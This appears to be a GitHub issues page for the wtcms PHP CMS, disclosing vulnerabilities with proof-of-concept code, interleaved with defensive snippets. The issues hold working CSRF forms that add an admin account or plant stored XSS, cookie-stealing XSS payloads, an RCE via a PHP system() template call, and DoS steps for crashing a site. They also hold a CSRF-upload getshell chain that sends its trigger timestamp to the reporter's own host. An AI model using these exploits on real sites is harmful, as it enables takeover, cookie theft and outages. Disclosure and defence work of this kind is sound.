
wtcms's People

Contributors

taosir


wtcms's Issues

CSRF combined with reflected XSS to obtain cookies

Reflected XSS exists in the administrator's page management section.
In the search box, enter "><a src=" to trigger the XSS.


Use the CSRF vulnerability to obtain cookies


POC

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/index.php?g=&m=admin_page&a=index" method="POST">
      <input type="hidden" name="start&#95;time" value="" />
      <input type="hidden" name="end&#95;time" value="" />
      <input type="hidden" name="keyword" value="&quot;&gt;&lt;svg&#32;onload&#61;alert&#40;document&#46;cookie&#41;&gt;&lt;a&#32;src&#61;&quot;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

There is an RCE vulnerability in wtcms

wtcms is based on thinkcmf, but an RCE vulnerability in thinkcmf was disclosed in October (details: https://www.freebuf.com/vuls/218105.html). An attacker can execute any command by requesting ?a=fetch&content=<?php system('ping xxxxxx');?>

To demonstrate this vulnerability, we reproduce it via dnslog.

After sending the request above, we get DNS query records on the dnslog platform.

Besides, we can read any file by sending the request ?a=display&templateFile=README.md

We can change the value of templateFile to read any file.

The size of the backend verification code image can be controlled, causing a denial of service.

1. Right-click to view the verification code image address.
2. Find width and height in the URL.
3. Use Burp Suite to capture the request and look at the size of the returned packet.
4. Try modifying the width and height values and watch the size of the returned packet.
5. The above test shows that the vulnerability exists. If we send one 10000 packet to the server and the server takes 10s to process it, what if we send 10 such 10000 packets?
10x10 = 100s
That is, the server needs 100s to process them. Then we send 100 such packets (of course, you should never actually send 100 of them; generally speaking, 20-50 in testing are enough to crash the website).

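As an added defensive example (not part of the issue or of wtcms), this is the server-side check a CAPTCHA endpoint needs so that the width and height taken from the query string cannot drive memory use; the bounds, the defaults and the 4-bytes-per-pixel estimate are assumptions.

```python
# Hard bounds for the login verification-code image. width/height arrive in
# the query string (as the issue shows), so they are untrusted: out-of-range
# or non-numeric values fall back to the default instead of being honoured.
MIN_W, MIN_H = 60, 20
MAX_W, MAX_H = 400, 150
DEFAULT_W, DEFAULT_H = 120, 40
BYTES_PER_PIXEL = 4  # RGBA canvas, as GD or Imagick would allocate it


def parse_dim(value, lo, hi, default):
    """Parse one dimension; anything that is not an integer within
    [lo, hi] returns the default (no clamping upward, no exception)."""
    try:
        n = int(str(value).strip())
    except (TypeError, ValueError):
        return default
    return n if lo <= n <= hi else default


def captcha_dims(query):
    """Dimensions actually used to render, from the raw query dict."""
    w = parse_dim(query.get("width"), MIN_W, MAX_W, DEFAULT_W)
    h = parse_dim(query.get("height"), MIN_H, MAX_H, DEFAULT_H)
    return w, h


def canvas_bytes(w, h):
    """Memory an uncompressed w x h canvas needs before encoding; shows
    why a single 10000x10000 request costs the server about 400 MB."""
    return w * h * BYTES_PER_PIXEL
```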

Stored XSS was found in three places

Three stored XSS were found in wtcms

POC:

javascript:alert(document.cookie)

1. In the backend article management, fill in the XSS code in the article's source field.


Find the published article on the frontend and click the link to trigger the XSS.


POC:

javascript:alert(document.cookie)

2. In the backend menu management, fill in the XSS code in the link field, then click save.


Find the location where the XSS code is inserted on the frontend and click it to trigger the XSS.


POC:

javascript:alert(document.cookie)

3. In the backend links management, fill in the XSS code in the link address, then click Save.


Find the link address at the bottom of the frontend and click it to trigger the XSS.

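An added example, not code from the issue or from wtcms: a validator for the three link fields named above (article source, menu link, link address) that rejects javascript: and other active schemes the way a browser would see them after entity decoding and control-character stripping; the allowed scheme list and the 2048-character limit are assumptions.

```python
import html
import re
import unicodedata
from urllib.parse import urlsplit

# Schemes a link field in a CMS legitimately needs. javascript:, data:,
# vbscript: and anything unknown are rejected before the value is stored.
ALLOWED_SCHEMES = {"http", "https", "mailto"}

# Browsers drop ASCII control characters and whitespace from a URL before
# parsing it, so "java\tscript:" still executes. Strip them the same way.
_CTRL_WS = re.compile(r"[\x00-\x20\x7f]")


def normalize_link(raw):
    """Bring a posted link into the form a browser would actually parse:
    decode HTML entities (href="javascript&colon;..." runs), fold
    full-width/compatibility characters, drop control chars and spaces."""
    s = html.unescape(raw)
    s = unicodedata.normalize("NFKC", s)
    return _CTRL_WS.sub("", s)


def is_safe_link(raw):
    """True only if the normalized link is relative or uses an allowed
    scheme. Meant for article source, menu link and link-address fields."""
    if not raw or len(raw) > 2048:
        return False
    s = normalize_link(raw)
    parts = urlsplit(s)
    if parts.scheme:
        return parts.scheme.lower() in ALLOWED_SCHEMES
    # No recognised scheme: accept plain relative paths, but refuse a value
    # whose first path segment still carries ':' (an unparsed scheme-like
    # prefix that urlsplit did not recognise).
    return ":" not in s.split("/", 1)[0]
```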

Getshell vulnerability

Getshell in three steps

  1. Open the following code file while the administrator is logged in.
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Title</title>
</head>
<body>
<script type="text/javascript">
    function post(url, fields) {
        var p = document.createElement("form");
        p.action = url;
        p.innerHTML = fields;
        p.target = "_self";
        p.method = "post";
        document.body.appendChild(p);
        p.submit();
    }

    function csrf_hack() {
        var fields = "";

        fields += "<input type='hidden' name='image[upload_max_filesize]' value='10240' />";
        fields += "<input type='hidden' name='image[extensions]' value='=jpg,jpeg,png,gif,bmp4,php' />";
        fields += "<input type='hidden' name='video[upload_max_filesize]' value='10240' />";
        fields += "<input type='hidden' name='audio[upload_max_filesize]' value='10240' />";
        fields += "<input type='hidden' name='file[upload_max_filesize]' value='10240' />";
        fields += "<input type='hidden' name='video[extensions]' value='mp4,avi,wmv,rm,rmvb,mkv' />";
        fields += "<input type='hidden' name='audio[extensions]' value='mp3,wma,wav' />";
        fields += "<input type='hidden' name='file[extensions]' value='txt,pdf,doc,docx,xls,xlsx,ppt,pptx,zip,rar' />";


        var url = "http://192.168.1.2/index.php?g=admin&m=setting&a=upload_post";
        post(url, fields);
    }

    window.onload = function () {
        csrf_hack();
    }
</script>
</body>
</html>

The above script uses the CSRF to add the suffix php to the whitelist of uploaded images.

  2. Next, have the logged-in administrator execute the following script, which uploads a PHP script to /data/upload/admin/[date]/[filename].php, where the date is the upload date, i.e. the date the script was triggered. The file name is generated by the PHP function uniqid().
<html>
<body>
<script>history.pushState('', '', '/')</script>
<script>
    function submitRequest() {
        var xhr1 = new XMLHttpRequest();
        xhr1.open('GET', "http://127.0.0.1:5000/?timestamp=" + (new Date()).valueOf(), true);
        xhr1.send(null);
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http:\/\/192.168.1.2\/index.php?g=asset&m=asset&a=plupload", true);
        xhr.setRequestHeader("Accept", "*\/*");
        xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2");
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------128712298613561");
        xhr.withCredentials = true;
        var body = "-----------------------------128712298613561\r\n" +
            "Content-Disposition: form-data; name=\"name\"\r\n" +
            "\r\n" +
            "abc.php\r\n" +
            "-----------------------------128712298613561\r\n" +
            "Content-Disposition: form-data; name=\"app\"\r\n" +
            "\r\n" +
            "Admin\r\n" +
            "-----------------------------128712298613561\r\n" +
            "Content-Disposition: form-data; name=\"file\"; filename=\"abc.php\"\r\n" +
            "Content-Type: application/octet-stream\r\n" +
            "\r\n" +
            "\x3c?php phpinfo();?\x3e\r\n" +
            "-----------------------------128712298613561--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
            aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));
    }

    window.onload = submitRequest;
</script>
</body>
</html>

In the above script, before uploading the PHP file, the script's trigger timestamp is sent to my host so that I know when the script fired (in preparation for brute-forcing the file name later); then a file is uploaded whose content is phpinfo();.

  3. The script has been uploaded and I got the timestamp at which it was uploaded; now we will find the file.
    (Screenshot: the timestamp obtained when the script was uploaded)

After two hours of attack, I received the following good news.
(Screenshot: the upload path was brute-forced)

Remote command execution succeeded.
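Added example (not from the issue or from wtcms) of the two server-side controls this chain needs: an upload check that refuses executable extensions regardless of what the configured whitelist says, and a stored file name that is not derived from the upload time; the whitelist shape and the extension sets are assumptions.

```python
import os
import secrets

# Extensions the web server may execute, or the browser treats as active
# content. They are refused even when the configured whitelist lists them,
# so a CSRF request that appends ",php" to the image whitelist (as in the
# first script above) no longer turns the uploader into a getshell.
SERVER_EXECUTABLE = {
    "php", "php3", "php4", "php5", "php7", "phtml", "phar", "phps", "pht",
    "shtml", "cgi", "pl", "jsp", "jspx", "asp", "aspx", "htaccess",
}
BROWSER_ACTIVE = {"html", "htm", "xhtml", "svg", "js"}

# Assumed shape of the per-category whitelist the admin upload page edits.
DEFAULT_EXTENSIONS = {"image": {"jpg", "jpeg", "png", "gif", "bmp"}}


def file_extensions(name):
    """All extensions of a client-supplied name, lowest first:
    'shell.php.jpg' -> ['php', 'jpg']. Null bytes and trailing dots or
    spaces are removed first, because they can change the name the
    filesystem finally sees (a C runtime stops at the null byte)."""
    base = os.path.basename(name.replace("\x00", "")).rstrip(". ")
    return [p for p in base.lower().split(".")[1:] if p]


def upload_allowed(name, category, configured):
    """Allow only if no extension in the chain is dangerous and the final
    one is whitelisted for this category. Checking the whole chain stops
    'shell.php.jpg' where Apache's AddHandler also matches the inner .php."""
    exts = file_extensions(name)
    if not exts:
        return False
    if any(e in SERVER_EXECUTABLE or e in BROWSER_ACTIVE for e in exts):
        return False
    return exts[-1] in configured.get(category, set())


def stored_name(name, category, configured):
    """Name to write under data/upload/: a random token plus the validated
    extension, instead of uniqid(), whose time-based value the issue above
    brute-forced from the leaked trigger timestamp."""
    if not upload_allowed(name, category, configured):
        raise ValueError("upload rejected: " + repr(name))
    return secrets.token_hex(16) + "." + file_extensions(name)[-1]
```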

There is a CSRF vulnerability that can add an administrator account

After the administrator logs in, open the CSRF exp page.

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/index.php?g=admin&m=user&a=add_post" method="POST">
      <input type="hidden" name="user&#95;login" value="hacker1" />
      <input type="hidden" name="user&#95;pass" value="hacker1" />
      <input type="hidden" name="user&#95;email" value="123&#64;qq&#46;com" />
      <input type="hidden" name="role&#95;id&#91;&#93;" value="2" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

admin login password is wrong

Hello, I tried entering admin's password 123456, but it says the password is wrong. Has the password been changed? Thanks

CSRF + XSS combination can obtain the administrator's cookie

The backend page for setting up website information has a CSRF vulnerability. An attacker constructs a CSRF payload, and once the administrator clicks the malicious link, the site information is changed automatically.
There is also an XSS in the website statistics code field.

We can write an XSS first and then construct the CSRF code, so that after the webmaster clicks the attacker's malicious link, the CSRF executes and the website then contains an XSS. As long as the administrator visits the homepage of the website, his cookie can be obtained.

CSRF Exp:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/wtcms/index.php?g=admin&m=setting&a=site_post" method="POST">
      <input type="hidden" name="options&#91;site&#95;name&#93;" value="test" />
      <input type="hidden" name="option&#95;id" value="10" />
      <input type="hidden" name="options&#91;site&#95;admin&#95;url&#95;password&#93;" value="" />
      <input type="hidden" name="options&#91;site&#95;tpl&#93;" value="default" />
      <input type="hidden" name="options&#91;site&#95;adminstyle&#93;" value="flat" />
      <input type="hidden" name="options&#91;site&#95;icp&#93;" value="" />
      <input type="hidden" name="options&#91;site&#95;admin&#95;email&#93;" value="" />
      <input type="hidden" name="options&#91;site&#95;tongji&#93;" value="&lt;script&gt;alert&#40;&quot;test&quot;&#41;&lt;&#47;script&gt;" />
      <input type="hidden" name="options&#91;site&#95;copyright&#93;" value="" />
      <input type="hidden" name="options&#91;site&#95;seo&#95;title&#93;" value="�&#191;&#189;�&#184;�&#187;�&#191;&#189;�&#161;�&#191;&#189;" />
      <input type="hidden" name="options&#91;site&#95;seo&#95;keywords&#93;" value="" />
      <input type="hidden" name="options&#91;site&#95;seo&#95;description&#93;" value="" />
      <input type="hidden" name="options&#91;urlmode&#93;" value="0" />
      <input type="hidden" name="options&#91;html&#95;suffix&#93;" value="" />
      <input type="hidden" name="options&#91;comment&#95;time&#95;interval&#93;" value="60" />
      <input type="hidden" name="cmf&#95;settings&#91;banned&#95;usernames&#93;" value="" />
      <input type="hidden" name="cdn&#95;settings&#91;cdn&#95;static&#95;root&#93;" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


There is one CSRF vulnerability that can add news

You can add articles in admin background, but there is a CSRF vulnerability.

POC

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/cms/wtcms-master/index.php?g=admin&m=nav&a=add_post" method="POST">
      <input type="hidden" name="cid" value="3" />
      <input type="hidden" name="parentid" value="72" />
      <input type="hidden" name="label" value="CSRF Test" />
      <input type="hidden" name="nav" value="on" />
      <input type="hidden" name="external&#95;href" value="http&#58;&#47;&#47;" />
      <input type="hidden" name="target" value="" />
      <input type="hidden" name="icon" value="" />
      <input type="hidden" name="status" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
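Added example, not code from these issues or from wtcms, of the request gate that would stop the CSRF pages in this and the earlier CSRF issues: an Origin/Referer check plus a session-bound HMAC token on every state-changing admin POST. The request dict shape, the _csrf field name, the one-hour lifetime and the in-process key are assumptions.

```python
import hashlib
import hmac
import secrets
import time
from urllib.parse import urlsplit

SECRET = secrets.token_bytes(32)  # per-deployment key; generated here for the example
TOKEN_TTL = 3600  # seconds a token stays valid


def issue_token(session_id, now=None):
    """Token the admin form embeds as _csrf: '<ts>.<hmac(session|ts)>'.
    Binding it to the session id means a token leaked or reused from
    another session does not validate."""
    ts = str(int(time.time() if now is None else now))
    mac = hmac.new(SECRET, f"{session_id}|{ts}".encode(), hashlib.sha256)
    return f"{ts}.{mac.hexdigest()}"


def token_valid(token, session_id, now=None):
    try:
        ts, mac = token.split(".", 1)
        age = (time.time() if now is None else now) - int(ts)
    except (ValueError, AttributeError):
        return False
    if not 0 <= age <= TOKEN_TTL:
        return False
    good = hmac.new(SECRET, f"{session_id}|{ts}".encode(), hashlib.sha256)
    return hmac.compare_digest(mac, good.hexdigest())


def same_origin(headers, site_origin):
    """Origin (or Referer as fallback) must be this site. A cross-site
    <form method=POST> always carries the attacker's Origin, and a POST
    with neither header is refused rather than trusted."""
    src = headers.get("Origin") or headers.get("Referer")
    if not src:
        return False
    p = urlsplit(src)
    return f"{p.scheme}://{p.netloc}" == site_origin


def admin_post_allowed(req, session_id, site_origin, now=None):
    """Gate for state-changing admin actions such as
    index.php?g=admin&m=user&a=add_post or ...&m=nav&a=add_post."""
    if req.get("method") != "POST":
        return False
    if not same_origin(req.get("headers", {}), site_origin):
        return False
    return token_valid(req.get("form", {}).get("_csrf", ""), session_id, now)
```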
